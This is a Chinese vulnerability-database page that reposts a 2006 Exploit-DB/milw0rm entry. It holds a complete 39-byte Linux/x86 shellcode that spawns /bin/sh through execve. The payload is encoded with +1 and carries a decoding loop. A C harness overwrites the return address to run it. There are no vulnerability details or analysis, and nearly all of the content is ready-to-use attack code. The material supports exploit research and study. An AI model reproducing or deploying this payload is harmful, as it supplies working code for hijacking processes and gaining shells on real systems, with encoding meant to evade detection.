Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055554 漏洞类型
发布时间 2006-01-25 更新时间 2006-01-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13384
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * (linux/x86) - execve("/bin/sh", ["/bin/sh"], NULL) / encoded by +1 - 39 bytes
 * - izik <izik@tty64.org>
 */

char shellcode[] = 

	"\x68\x8a\xe2\xce\x81"  // push $0x81cee28a 
	"\x68\xb1\x0c\x53\x54"  // push $0x54530cb1 
	"\x68\x6a\x6f\x8a\xe4"  // push $0xe48a6f6a 
	"\x68\x01\x69\x30\x63"  // push $0x63306901 
	"\x68\x69\x30\x74\x69"  // push $0x69743069 
	"\x6a\x14"              // push $0x14 
	"\x59"                  // pop %ecx 
	
	//
	// <_unpack_loop>:
	//

	"\xfe\x0c\x0c"          // decb (%esp,%ecx,1) 
	"\x49"                  // dec %ecx 
	"\x79\xfa"              // jns <_unpack_loop> 
	"\x41"                  // inc %ecx 
	"\xf7\xe1"              // mul %ecx 
	"\x54"                  // push %esp 
	"\xc3";                 // ret 

int main(int argc, char **argv) {
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int) shellcode;
}

// milw0rm.com [2006-01-25]